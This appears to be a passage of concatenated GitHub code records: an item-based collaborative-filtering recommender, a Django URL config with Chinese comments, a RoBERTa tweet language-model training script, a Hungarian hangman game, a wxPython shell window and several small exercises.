\"invalid mode\"\n self.mode = mode\n self.load_data(file_path)\n\n\n def load_data(self, file_path):\n \"\"\"\n 加载数据,分割训练集、验证集\n \"\"\"\n #data = pd.read_table(os.path.join(file_path,'ratings.dat'), sep='::', names = ['userID','itemID','Rating','Zip-code'])\n data = pd.read_csv(os.path.join(file_path, 'sample.csv'))\n uid_lbe = LabelEncoder()\n data['userID'] = uid_lbe.fit_transform(data['userID'])\n self.n_users = max(uid_lbe.classes_)\n iid_lbe = LabelEncoder()\n data['itemID'] = iid_lbe.fit_transform(data['itemID'])\n self.n_items = max(iid_lbe.classes_)\n\n self.train_data, self.valid_data = train_test_split(data,test_size=0.1)\n \n self.train_users = self.train_data.groupby('userID')['itemID'].apply(list).to_dict()\n self.valid_users = self.valid_data.groupby('userID')['itemID'].apply(list).to_dict()\n\n def pearsonrSim(self,x,y):\n \"\"\"\n 返回皮尔逊相关系数\n \"\"\"\n if len(x)==0:\n return 0\n elif len(x)<3:\n return 1\n else:\n return pearsonr(x,y)[0]\n\n def Pearsonr_ItemCF(self, K ,N):\n '''\n K: K表示的是相似用户的数量,每个用户都选择与其最相似的K个用户\n N: N表示的是给用户推荐的商品数量,给每个用户推荐相似度最大的N个商品\n '''\n if os.path.exists('ratings_item.txt') and os.path.exists('ratings_user.txt'):\n print('读取用户-物品矩阵...')\n with open('ratings_user.txt', 'rb') as f1:\n ratings_user = pickle.load(f1)\n with open('ratings_item.txt', 'rb') as f2:\n ratings_item = pickle.load(f2)\n else: \n ratings_user = dict()\n ratings_item = dict()\n print('开始创建用户-物品矩阵...')\n for _, row in tqdm(self.train_data.iterrows(),total=len(self.train_data)):\n user,item,rating = row['userID'],row['itemID'],row['Rating']\n if item not in ratings_item:\n ratings_item[item] = dict()\n ratings_item[item][user] = rating\n if user not in ratings_user:\n ratings_user[user] = dict()\n ratings_user[user][item] = rating\n\n print('用户-物品矩阵创建完毕!!!')\n with open('ratings_user.txt', 'wb') as f1:\n pickle.dump(ratings_user,f1)\n with open('ratings_item.txt', 'wb') as f2:\n pickle.dump(ratings_item,f2)\n\n if os.path.exists('item_similarity_matrix.txt'):\n print('读取物品相似度矩阵...')\n with open('item_similarity_matrix.txt','rb') as f3:\n similarity_matrix = pickle.load(f3)\n else:\n print('开始创建物品相似度矩阵...')\n # 相似度矩阵用二维数组储存,如果用字典保存,测试集评估会出现 key_error,比较麻烦\n similarity_matrix = -1 * np.ones(shape=(self.n_items,self.n_items))\n for itemx in tqdm(ratings_item, total=len(ratings_item)):\n for itemy in ratings_item:\n if itemy == itemx:\n continue\n itemxVec = []\n itemyVec = []\n itemx_history = set(ratings_item[itemx].keys())\n itemy_history = set(ratings_item[itemy].keys())\n intersection = itemx_history.intersection(itemy_history)\n for item in intersection:\n itemxVec.append(ratings_item[itemx][item])\n itemyVec.append(ratings_item[itemy][item])\n similarity_matrix[itemx][itemy] = similarity_matrix[itemy][itemx] = self.pearsonrSim(itemxVec,itemyVec)\n print('相似度矩阵构建完毕')\n with open('item_similarity_matrix.txt','wb') as f3:\n similarity_matrix = pickle.dump(similarity_matrix,f3)\n\n # 处理pearsonr相关系数为nan的值\n df = pd.DataFrame(similarity_matrix)\n df = df.fillna(0)\n similarity_matrix = df.to_numpy()\n del df\n\n # 计算每个物品的平均评分,用于消除用户评分偏置\n avg_item_ratings = np.zeros(self.n_items)\n for item,rate_list in ratings_item.items():\n avg_rating = np.mean([rate for rate in rate_list.values()])\n avg_item_ratings[item] = avg_rating\n\n # 生成TopN推荐列表\n # 要预测的物品就是用户没有评分过的物品\n # 先筛选出用户交互过的商品\n # 再选出与这些物品最相似的K个物品,并且过滤掉用户已经交互过的物品\n # 再根据用户交互过的商品的得分,计算目标物品的得分\n # 对这些items得分降序排列\n val_users_set = set(self.valid_users.keys())\n rec_dict = dict()\n factor = dict()\n print('给用户进行推荐...')\n for user in tqdm(val_users_set, total=len(val_users_set)):\n rec_dict[user] = dict() # 该用户的推荐物品得分字典\n factor[user] = dict() # 分母\n user_history = ratings_user[user].keys()\n for item in user_history: # 选出与用户交互过的物品最相似的K个物品\n similar_items_idx = np.argsort(-similarity_matrix[item])[:K]\n similarity_of_items = similarity_matrix[item][similar_items_idx]\n for iitem, score in zip(similar_items_idx, similarity_of_items):\n if iitem not in user_history: # 过滤掉用户已经交互过的物品\n if iitem not in rec_dict[user]:\n rec_dict[user][iitem] = 0\n if iitem not in factor[user]:\n factor[user][iitem] = 0\n #rec_dict[user][iitem] += score * (ratings_user[user][item] - avg_item_ratings[item]) # 含偏置\n rec_dict[user][iitem] += score * ratings_user[user][item] # 不含偏置\n factor[user][iitem] += score\n for item_idx,rank_score in rec_dict[user].items():\n #rank_score += avg_item_ratings[item_idx] # 含偏置\n rank_score /= factor[user][item_idx]\n rec_dict[user][item_idx] = rank_score\n print('为每个用户筛选出相似度分数最高的N个商品...')\n self.TopN_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in rec_dict.items()}\n self.TopN_rec_dict = {k: set([x[0] for x in v]) for k, v in self.TopN_rec_dict.items()}\n self.rec_dict = rec_dict\n\n\n def Cosine_Item_CF(self, K, N):\n '''\n train_users: 表示训练数据,格式为:{user_id1: [item_id1, item_id2,...,item_idn], user_id2...}\n valid_users: 表示验证数据,格式为:{user_id1: [item_id1, item_id2,...,item_idn], user_id2...}\n K: K表示的是相似商品的数量,为每个用户交互的每个商品都选择其最相思的K个商品\n N: N表示的是给用户推荐的商品数量,给每个用户推荐相似度最大的N个商品\n '''\n\n # 建立user->item的倒排表\n # 倒排表的格式为: {user_id1: [item_id1, item_id2,...,item_idn], user_id2: ...} 也就是每个用户交互过的所有商品集合\n # 由于输入的训练数据train_users,本身就是这中格式的,所以这里不需要进行额外的计算\n \n\n # 只要物品u,v共同被某个用户交互过,它们之间的相似度就 +1 ---> 协同过滤矩阵\n # 最后再除以 sqrt(N(u)*N(v)) ---> 相似度矩阵\n\n\n # 计算商品协同过滤矩阵 \n # 即利用user-items倒排表统计商品与商品之间被共同的用户交互的次数\n # 商品协同过滤矩阵的表示形式为:sim = {item_id1: {item_id2: num1}, item_id3: {item_id4: num2}, ...}\n # 商品协同过滤矩阵是一个双层的字典,用来表示商品之间共同交互的用户数量\n # 在计算商品协同过滤矩阵的同时还需要记录每个商品被多少不同用户交互的次数,其表示形式为: num = {item_id1:num1, item_id2:num2, ...}\n sim = {}\n num = {}\n print('构建相似性矩阵...')\n for uid, items in tqdm(self.train_users.items()):\n for i in items: \n if i not in num:\n num[i] = 0\n num[i] += 1\n if i not in sim:\n sim[i] = {}\n for j in items:\n if j not in sim[i]:\n sim[i][j] = 0\n if i != j:\n sim[i][j] += 1\n \n # 计算物品的相似度矩阵 step 2\n # 商品协同过滤矩阵其实相当于是余弦相似度的分子部分,还需要除以分母,即两个商品被交互的用户数量的乘积\n # 两个商品被交互的用户数量就是上面统计的num字典\n print('计算协同过滤矩阵...')\n for i, items in tqdm(sim.items()):\n for j, score in items.items():\n if i != j:\n sim[i][j] = score / math.sqrt(num[i] * num[j])\n \n\n # 对验证数据中的每个用户进行TopN推荐\n # 在对用户进行推荐之前需要先通过商品相似度矩阵得到当前用户交互过的商品最相似的前K个商品,\n # 然后选出其中目标用户没有交互过的商品,计算最终的相似度分数\n # 最终推荐的候选商品的相似度分数是由多个相似商品对该商品分数的一个累加和\n pre_dict = {}\n print('给用户进行推荐...')\n for uid, _ in tqdm(self.valid_users.items()):\n pre_dict[uid] = {} # 存储用户候选的推荐商品\n for hist_item in self.train_users[uid]: # 遍历该用户历史喜欢的商品,用来下面寻找其相似的商品\n for item, score in sorted(sim[hist_item].items(), key=lambda x: x[1], reverse=True)[:K]:\n if item not in self.train_users[uid]: # 进行推荐的商品一定不能在历史喜欢商品中出现\n if item not in pre_dict[uid]:\n pre_dict[uid][item] = 0\n pre_dict[uid][item] += score\n \n print('为每个用户筛选出相似度分数最高的N个商品...')\n TopN_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in pre_dict.items()}\n self.TopN_rec_dict = {k: set([x[0] for x in v]) for k, v in TopN_rec_dict.items()}\n\n\n def predict(self, TopK, TopN):\n if self.mode == 'cosine':\n self.Cosine_Item_CF(TopK, TopN)\n elif self.mode =='pearsonr':\n self.Pearsonr_ItemCF(TopK, TopN)\n\n def eval(self,rmse=True):\n \"\"\"\n rec_dict: 推荐算法返回的推荐列表, 形式:{uid: {item1, item2,...}, uid: {item1, item2,...}, ...} \n val_users: 用户实际点击的商品列表, 形式:{uid: {item1, item2,...}, uid: {item1, item2,...}, ...}\n tra_users: 训练集实际点击的商品列表, 形式:{uid: {item1, item2,...}, uid: {item1, item2,...}, ...}\n \"\"\"\n if rmse:\n pre_list = []\n rel_list = []\n for idx,row in self.valid_data.iterrows():\n userID,itemID,Rating,_ = row\n rel_list.append(Rating)\n if userID in self.rec_dict:\n if itemID in self.rec_dict[userID]:\n pre_list.append(self.rec_dict[userID][itemID])\n continue\n pre_list.append(0)\n _rmse = RMSE(rel_list, pre_list)\n print(f'均方根误差RMSE:{round(_rmse,5)}')\n\n print('recall:',Recall(self.TopN_rec_dict, self.valid_users))\n print('precision',Precision(self.TopN_rec_dict, self.valid_users))\n print('coverage',Coverage(self.TopN_rec_dict, self.train_users))\n print('Popularity',Popularity(self.TopN_rec_dict, self.train_users))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--TopN', type=int, default=10, help='number of top score items selected')\n parser.add_argument('--TopK', type=int, default=10, help='number of similar items/users')\n parser.add_argument('--rmse', action='store_false', help='rmse')\n parser.add_argument('--mode', type=str, default='cosine', help='choose mode:cosine,pearsonr')\n args = parser.parse_args()\n\n model = ItemCF('../dataset/ml-1m', args.mode)\n model.predict(args.TopK, args.TopN)\n model.eval(rmse=args.rmse)\n\n\n ","repo_name":"Guadzilla/Basics-of-Recsys","sub_path":"task4/ItemCF.py","file_name":"ItemCF.py","file_ext":"py","file_size_in_byte":13357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8360431333","text":"# -*- coding:utf-8 -*-\n# project_xxx\\venv\\Scripts python\n\n'''\nAuthor: Felix\nWeiXin: AXiaShuBai\nEmail: xiashubai@gmail.com\nBlog: https://blog.csdn.net/u011318077\nGihHub: https://github.com/FelixZFB\nDate: 2020/4/26 11:04\nDesc:\n'''\n\nfrom django.conf.urls import url #导入url函数\n# 此处导入注意,由于test1和test2项目文件都标记为了source root\n# 此处搜索booktest时候开始按循序先搜到了test1文件中的,然后导入的views就是test1中的\n# 解决方法,不同项目尽量不要使用相同的名称,可以避免\n# 折中方法:取消test1和test2的source root标记,\nfrom booktest import views #导入视图模块\n\n\n# 应用urls文件中的配置时候注意:\n# 1.严格匹配url地址的开头和结尾\n# http://127.0.0.1:8000/index 从主页/之后开始匹配\n\nurlpatterns = [\n # r表示一个纯字符串,^表示从字符串开头开始匹配\n # 第一个参数是一个正则表达式,第二个参数网址匹配成功后调用的处理方法\n url(r'^index$', views.index, name='index'), # 建立url和视图函数的联系,指定name参数,会自动将name的值和前面正则表达式中值进行动态匹配\n url(r'^index1$', views.index1), # 建立url和视图函数的联系\n url(r'^temp_tags$', views.temp_tags), # 模板标签使用\n url(r'^temp_inherit$', views.temp_inherit), # 模板继承\n url(r'^temp_escape$', views.temp_escape), # 模板转义\n url(r'^login$',views.login), # 显示登录界面\n url(r'^login_check$',views.login_check), # 用户校验\n url(r'^change_pwd$',views.change_pwd), # 显示修改密码页面\n url(r'^change_pwd_action$',views.change_pwd_action), # 修改密码处理\n url(r'^url_reverse$',views.url_reverse), # url反向解析网页,反向解析首页index\n url(r'^show_args/(\\d+)/(\\d+)$',views.show_args, name='show_args'), # 捕获位置参数\n url(r'^show_kwargs/(?P<num1>\\d+)/(?P<num2>\\d+)$',views.show_kwargs, name='show_kwargs'), # 捕获关键字参数,使用?P<num1>标明关键字为键为num1,就是正则表达式关键字分组\n url(r'^test_redirect$',views.test_redirect), # 视图使用url反向解析\n\n url(r'^static_test$',views.static_test), # 静态文件使用\n url(r'^index2$',views.index2), # 首页2\n url(r'^index3$',views.index3), # 首页3\n\n url(r'^pic_upload$', views.pic_upload), # 上传图片页面\n url(r'^pic_handle$', views.pic_handle), # 图片保存到文件夹中\n\n # 使用关键字分组,\\d*表示匹配0个或多个\n url(r'^show_area/(?P<pageindex>\\d*)$', views.show_area), # 显示地区信息\n url(r'^areas$', views.areas), # 省市区选择\n url(r'^prov$', views.prov), # 获取所有省级地区信息,返回json格式数据\n url(r'^city/(\\d+)$', views.city), # 获取省下面市级信息\n url(r'^dis/(\\d+)$', views.city), # 获取市下面县级信息,由于查询都是通过父级ID,查询方法和市级一样,使用同一个视图函数\n\n]\n\n\n# 注意:匹配时候urlpatterns中的表达式匹配网址提取的内容\n# 并且从上往下匹配,匹配到一个就结束匹配\n# 如果访问index2,我们用表达式中的index去匹配index2也是正确匹配的\n# 因此我们需要严格匹配,匹配字符串开头^到结尾$,保证一致性\n\n# 访问http://127.0.0.1:8000/index网页的步骤如下:\n# 1.浏览器访问网址,django会自动提取地址/后面的 index\n# 2.index 先到项目下的test4/urls中的urlpatterns中依次匹配\n# 3.r''可以匹配任何内容,然后进booktest.urls中继续匹配\n# 4.url(r'^index', views.index)匹配成功,然后调用的是视图views.index方法\n# 5.返回index方法的结果,将内容显示在网页上\n\n# 先启动服务器:python manage.py runserver\n# 然后打开上面网页:http://127.0.0.1:8000/index","repo_name":"FelixZFB/Django_2020","sub_path":"03_test4/test4/booktest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38475688700","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#get_ipython().system('nvidia-smi')\n\n\n# In[2]:\n\n\nimport os\nimport pandas as pd\nimport tqdm\nimport math\n\n\n# In[3]:\n\n\n# from google.colab import drive\n\n# drive.mount('/content/drive', force_remount=True)\n\n\n# In[4]:\n\n\n# from google.colab import auth\n# auth.authenticate_user()\n\n# import gspread\n# from oauth2client.client import GoogleCredentials\n\n# gc = gspread.authorize(GoogleCredentials.get_application_default())\n\n\n# In[5]:\n\n\n# worksheet = gc.open('Tweets_Spring_Summer_2021_coded').sheet1\n\n# sheet_data = worksheet.get_all_values()\n# df = pd.DataFrame.from_records(sheet_data[1:], columns=sheet_data[0])\n# # print('Num examples:', len(df))\n# # print('Null Values\\n', df.isna().sum())\n# # df.dropna(inplace=True)\n# # print('Num examples:', len(df))\n\n# # in the tweets find the hashtag\n# df['hashTags'] = df['Tweet'].str.findall(\"#(\\w+)\")\n# # in the tweets find the mentions\n# df['mentions'] = df['Tweet'].str.findall(\"@(\\w+)\")\n\n# # Remove hashtag and mentions\n# df['Tweet'] = df['Tweet'].str.replace(r'#(\\w+)', '', regex=True)\n# df['Tweet'] = df['Tweet'].str.replace(r'@(\\w+)', '', regex=True)\n\n# df\n\n\n# In[6]:\n\n\n#df1 =pd.read_csv('20161006.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\n#df2 =pd.read_csv('20161007.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\ndf =pd.read_csv('2020_01_01.csv',lineterminator='\\n',skipinitialspace=True, usecols= ['text'])\n\n\n# frame = [df1, df2]\n# df = pd.concat(frame)\ndf.rename(columns={'text':'Tweet'}, inplace=True)\ndf.shape\n\n\n# In[7]:\n\n\ndf = df.dropna()\n\n\n# In[8]:\n\n\ndf.shape\n\n\n# In[9]:\n\n\n#Set the path to the data folder, datafile and output folder and files\nroot_folder = '/users/kent/jmaharja/drugAbuse'\n# data_folder = os.path.abspath(os.path.join(root_folder, 'datasets/text_gen_product_names'))\nmodel_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse/RoBERTaMLM/'))\noutput_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse'))\ntokenizer_folder = os.path.abspath(os.path.join(root_folder, 'output/Drug-Abuse/TokRoBERTa/'))\n\n# test_filename='Tweets_Spring_Summer_2021_coded'\n# datafile= 'product_names_desc_cl_train.csv'\noutputfile = 'submission.csv'\n\n# datafile_path = os.path.abspath(os.path.join(data_folder,datafile))\n# testfile_path = os.path.abspath(os.path.join(data_folder,test_filename))\noutputfile_path = os.path.abspath(os.path.join(output_folder,outputfile))\n\n\n# Build a Tokenizer\n\n# In[10]:\n\n\n# Drop the files from the output dir\n# txt_files_dir = \"./text_split_2020\"\n# !rm -rf {txt_files_dir}\n# !mkdir {txt_files_dir}\n\n\n# In[11]:\n\n\n# Store values in a dataframe column (Series object) to files, one file per record\ndef column_to_files(column, prefix, txt_files_dir):\n # The prefix is a unique ID to avoid to overwrite a text file\n i=prefix\n #For every value in the df, with just one column\n for row in column.to_list():\n # Create the filename using the prefix ID\n file_name = os.path.join(txt_files_dir, str(i)+'.txt')\n try:\n # Create the file and write the column text to it\n f = open(file_name, 'wb')\n f.write(row.encode('utf-8'))\n f.close()\n except Exception as e: #catch exceptions(for eg. empty rows)\n print(row, e) \n i+=1\n # Return the last ID\n return i\n\n\n# In[12]:\n\n\ndata = df[\"Tweet\"]\n# Removing the end of line character \\n\ndata = data.replace(\"\\n\",\" \")\n# Set the ID to 0\nprefix=0\n# Create a file for every description value\n# prefix = column_to_files(data, prefix, txt_files_dir)\n# # Print the last ID\n# print(prefix)\n\n\n# Train the tokenizer\n# \n\n# In[13]:\n\n\nfrom pathlib import Path\n\nfrom tokenizers import ByteLevelBPETokenizer\nfrom tokenizers.processors import BertProcessing\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\n\n# In[14]:\n\n\n#get_ipython().run_cell_magic('time', '', 'paths = [str(x) for x in Path(\".\").glob(\"text_split/*.txt\")]\\n\\n# Initialize a tokenizer\\ntokenizer = ByteLevelBPETokenizer(lowercase=True)\\n\\n# Customize training\\ntokenizer.train(files=paths, vocab_size=8192, min_frequency=2,\\n show_progress=True,\\n special_tokens=[\\n \"<s>\",\\n \"<pad>\",\\n \"</s>\",\\n \"<unk>\",\\n \"<mask>\",\\n])')\n#time \npaths = [str(x) for x in Path(\".\").glob(\"text_split/*.txt\")]\n\n# Initialize a tokenizer\ntokenizer = ByteLevelBPETokenizer(lowercase=True)\n\n# Customize training\ntokenizer.train(files=paths, vocab_size=8192, min_frequency=2,\n show_progress=True,\n special_tokens=[\n \"<s>\",\n \"<pad>\",\n \"</s>\",\n \"<unk>\",\n \"<mask>\",\n])\n\n# In[ ]:\n\n\n#Save the Tokenizer to disk\ntokenizer.save_model(tokenizer_folder)\n\n\n# In[15]:\n\n\n# Create the tokenizer using vocab.json and mrege.txt files\ntokenizer = ByteLevelBPETokenizer(\n os.path.abspath(os.path.join(tokenizer_folder,'vocab.json')),\n os.path.abspath(os.path.join(tokenizer_folder,'merges.txt'))\n)\n\n\n# In[16]:\n\n\n# Prepare the tokenizer\ntokenizer._tokenizer.post_processor = BertProcessing(\n (\"</s>\", tokenizer.token_to_id(\"</s>\")),\n (\"<s>\", tokenizer.token_to_id(\"<s>\")),\n)\ntokenizer.enable_truncation(max_length=512)\n\n\n# In[17]:\n\n\ntokenizer.encode(\"cook some blue.\")\n\n\n# In[18]:\n\n\ntokenizer.encode(\"cook some blue.\").tokens\n\n\n# Train a language model from scratch\n# \n# \n\n# In[19]:\n\n\nTRAIN_BATCH_SIZE = 16 # input batch size for training (default: 64)\nVALID_BATCH_SIZE = 8 # input batch size for testing (default: 1000)\nTRAIN_EPOCHS = 15 # number of epochs to train (default: 10)\nLEARNING_RATE = 1e-4 # learning rate (default: 0.001)\nWEIGHT_DECAY = 0.01\nSEED = 42 # random seed (default: 42)\nMAX_LEN = 128\nSUMMARY_LEN = 7\n\n\n# In[20]:\n\n\n# Check that PyTorch sees it\nimport torch\ntorch.cuda.is_available()\n\n\n# In[21]:\n\n\nfrom transformers import RobertaConfig\n\nconfig = RobertaConfig(\n vocab_size=8192,\n max_position_embeddings=514,\n num_attention_heads=12,\n num_hidden_layers=6,\n type_vocab_size=1,\n)\n\n\n# In[22]:\n\n\nfrom transformers import RobertaForMaskedLM\n\nmodel = RobertaForMaskedLM(config=config)\nprint('Num parameters: ',model.num_parameters())\n\n\n# In[23]:\n\n\nfrom transformers import RobertaTokenizerFast\n# Create the tokenizer from a trained one\ntokenizer = RobertaTokenizerFast.from_pretrained(tokenizer_folder, max_len=MAX_LEN)\n\n\n# In[24]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nRANDOM_SEED = 42\ntrain_df, test_df = train_test_split(df, test_size=0.1, random_state=RANDOM_SEED)\nval_df, test_df = train_test_split(test_df, test_size=0.5, random_state=RANDOM_SEED)\n\n\n# Building the training Dataset\n\n# In[25]:\n\n\nclass CustomDataset(Dataset):\n def __init__(self, df, tokenizer):\n # or use the RobertaTokenizer from `transformers` directly.\n\n self.examples = []\n \n for example in df.values:\n x=tokenizer.encode_plus(example, max_length = MAX_LEN, truncation=True, padding=True)\n self.examples += [x.input_ids]\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n # We’ll pad at the batch level.\n return torch.tensor(self.examples[i])\n\n\n# In[26]:\n\n\n# Create the train and evaluation dataset\ntrain_dataset = CustomDataset(train_df['Tweet'], tokenizer)\neval_dataset = CustomDataset(test_df['Tweet'], tokenizer)\n\n\n# In[27]:\n\n\nfrom transformers import DataCollatorForLanguageModeling\n\n# Define the Data Collator\ndata_collator = DataCollatorForLanguageModeling(\n tokenizer=tokenizer, mlm=True, mlm_probability=0.15\n)\n\n\n# In[28]:\n\n\nfrom torch import nn\nfrom transformers import Trainer, TrainingArguments\n\n\n# In[29]:\n\n\n#from transformers import Trainer, TrainingArguments\n\nprint(model_folder)\n# Define the training arguments\ntraining_args = TrainingArguments(\n output_dir=model_folder,\n overwrite_output_dir=True,\n evaluation_strategy = 'epoch',\n num_train_epochs=TRAIN_EPOCHS,\n learning_rate=LEARNING_RATE,\n weight_decay=WEIGHT_DECAY,\n per_device_train_batch_size=TRAIN_BATCH_SIZE,\n per_device_eval_batch_size=VALID_BATCH_SIZE,\n save_steps=8192,\n #eval_steps=4096,\n save_total_limit=1,\n)\n# Create the trainer for our model\ntrainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n #prediction_loss_only=True,\n)\n\n\n# In[ ]:\n\n\n# Train the model\ntrainer.train()\n\n\n# In[ ]:\n\n\neval_results = trainer.evaluate()\nprint(f\"Perplexity: {math.exp(eval_results['eval_loss']):.2f}\")\n\n\n# In[ ]:\n\n\ntrainer.save_model(model_folder)\n\n\n# In[ ]:\n\n\ntokenizer_folder\n\n\n# In[ ]:\n\n\nfrom transformers import pipeline\n\nfill_mask = pipeline(\n \"fill-mask\",\n model=model_folder,\n tokenizer=tokenizer_folder\n)\n\n\n# In[ ]:\n\n\nfill_mask(\"Alcohol and drugs is good for the <mask>\")\n\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"JulinaM/robertaForTweetAnalysis","sub_path":"temp/test_scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25165687158","text":"puzzle = \"alma\" # Kitalálandó szó\nmegoldas = \"\" # A játékos megoldása\nfor x in puzzle: # végigmegy a kitalálandó szavat és kitölti csillagokkal\n if x == \" \":\n megoldas += \" \"\n else:\n megoldas += \"*\"\ncorrect = [] # Helyes betük listája\nincorrect = [] # Helytelen betük\nlifes = 10 # Probálkozások száma\n\n\ndef Elet():\n global lifes\n lifes -= 1\n print(f\"{lifes} élet van hátra.\")\n\n\nwhile puzzle != megoldas and lifes > 0: # Fő játék ciklus\n print(megoldas) # Ki írja a jelenlegi tippet\n print(correct)\n print(incorrect)\n tipp = input(\"Tippelj egy betűt:\\n> \")\n if len(tipp) == len(puzzle): # Ha a karakterek száma ugyan annyi\n temp = megoldas # Ideglenesen eltárolja a megoldást, hogy később visszaálithassa\n megoldas = tipp # A tippet átrakja a megoldásba, hiszen a program azzal ellenőrzi\n print(\"Megpróbáltál tippelni\")\n if megoldas == puzzle:\n print(\"Helyes Válasz\")\n else:\n print(\"Ez helytelen. (-1 élet.)\")\n megoldas = temp\n Elet()\n else:\n talalat = False\n for b in range(len(puzzle)):\n if b == puzzle[b]:\n megoldas_lista = list(megoldas)\n megoldas_lista[b] = tipp\n megoldas = \"\".join(megoldas_lista)\n talalat = True\n if not talalat:\n print(\"Ilyen betű nincsen. (-1 Élet.)\")\n incorrect.append(tipp)\n Elet()\n else:\n correct.append(tipp) # megnézi hogy vannak-e helyes betűk\nif lifes > 0:\n print(\"Nyertél!\")\nelse:\n print(\"Vesztettél\")\n","repo_name":"Petint/python-archhives","sub_path":"lsc/Python 1/kasztófa.py","file_name":"kasztófa.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40812303502","text":"import wx\nimport os\n\nclass ShellFrame(wx.Frame):\n\n def __init__(self, shell):\n self.app = wx.App(False)\n wx.Frame.__init__(self, None, title=\"OS Shell\", size=(450, 300))\n self.shell = shell\n self.historyIndex = 0\n self.SetBackgroundColour(wx.BLACK)\n self.initComponents()\n self.initEvents()\n self.Centre()\n self.Show(True)\n\n def initComponents(self):\n self.txtHistory = wx.TextCtrl(self, style=wx.TE_MULTILINE | wx.TE_READONLY)\n self.txtHistory.SetBackgroundColour(wx.BLACK)\n self.txtHistory.SetForegroundColour(wx.WHITE)\n self.txtHistory.Refresh()\n self.txtCommand = wx.TextCtrl(self, style=wx.TE_PROCESS_ENTER)\n self.txtCommand.SetBackgroundColour(wx.BLACK)\n self.txtCommand.SetForegroundColour(wx.WHITE)\n self.txtCommand.Refresh()\n self.txtCommand.SetFocus()\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.txtHistory, 1, wx.EXPAND)\n sizer.Add(self.txtCommand, 0, wx.EXPAND)\n self.SetSizer(sizer)\n self.SetAutoLayout(1)\n\n def initEvents(self):\n self.Bind(wx.EVT_TEXT_ENTER, self.onEnterCommand, self.txtCommand)\n self.Bind(wx.EVT_CHAR_HOOK, self.onKeyPressed, self.txtCommand)\n\n def onEnterCommand(self, event):\n command = event.GetString()\n self.printLn(\"> \" + command)\n if command and not self.shell.runCommand(command):\n self.printLn(\"No command '\" + command + \"' found.\")\n self.txtCommand.Clear()\n self.historyIndex = 0\n\n def onKeyPressed(self, event):\n if event.GetKeyCode() == wx.WXK_DOWN:\n self.showNextCommand()\n elif event.GetKeyCode() == wx.WXK_UP:\n self.showPrevCommand()\n else:\n event.Skip()\n\n def showPrevCommand(self):\n try:\n command = self.shell.history[self.historyIndex - 1]\n self.historyIndex = self.historyIndex - 1\n self.showCommand(command)\n except IndexError:\n pass\n\n def showNextCommand(self):\n index = self.historyIndex + 1\n if index == 0:\n self.showCommand(\"\")\n self.historyIndex = index\n elif index < 0:\n command = self.shell.history[index]\n self.showCommand(command)\n self.historyIndex = index\n\n def showCommand(self, command):\n self.txtCommand.Clear()\n self.txtCommand.AppendText(command)\n\n def printLn(self, text):\n self.txtHistory.AppendText(text)\n self.txtHistory.AppendText(os.linesep)\n\n def start(self):\n self.app.MainLoop()\n","repo_name":"hslavich/pyshell","sub_path":"pyshell/gui/shellframe.py","file_name":"shellframe.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18384143452","text":"def pre_order(n):\n if n:\n print(chr(n+64),end='')\n pre_order(left[n])\n pre_order(right[n])\ndef in_order(n):\n if n:\n in_order(left[n])\n print(chr(n+64),end='')\n in_order(right[n])\ndef post_order(n):\n if n:\n post_order(left[n])\n post_order(right[n])\n print(chr(n+64),end='')\n\nN = int(input())\nleft =[0]*27\nright =[0]*27\n\nfor ts in range(N):\n p,l,r = input().split()\n if l!=\".\":\n left[ord(p)-64] = ord(l)-64\n if r!=\".\":\n right[ord(p)-64]= ord(r)-64\n \npre_order(1)\nprint()\nin_order(1)\nprint()\npost_order(1)\n\n# print(ord('A'))# 65\n","repo_name":"bbnerino/Algolithm","sub_path":"Study/stack_Q/1991_트리순회.py","file_name":"1991_트리순회.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24152423428","text":"import numpy as np\nimport json\n\ndef save_hyper(feat_type, add_bias, lr, reg_const):\n '''\n Saves the parameters tuned for different sub-problems of the assignment into a file.\n This file is later used for evaluation purposes.\n '''\n \n prob_dict = dict()\n prob_dict['add_bias'] = add_bias\n prob_dict['lr'] = lr\n prob_dict['reg_const'] = reg_const\n\n filename = 'hyper_param.json'\n \n try:\n with open(filename, 'r') as fp:\n dict_hyper = json.load(fp)\n except:\n dict_hyper = dict()\n\n dict_hyper[feat_type] = prob_dict\n with open(filename, 'w') as fp:\n json.dump(dict_hyper, fp)\n","repo_name":"abhigupta768/CSE-231N-AI_assignments","sub_path":"Assignment_3/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"24178161254","text":"import json\nfrom topo.topo import Topo\n\nclass OSPF(Topo):\n def load_from_file(self, filename):\n with open(filename, 'r') as f:\n for line in f: \n if line.startswith('#'): continue\n tokens = line.strip('\\n').split('|')\n assert len(tokens) >= 3\n node1, node2, w = int(tokens[0]), 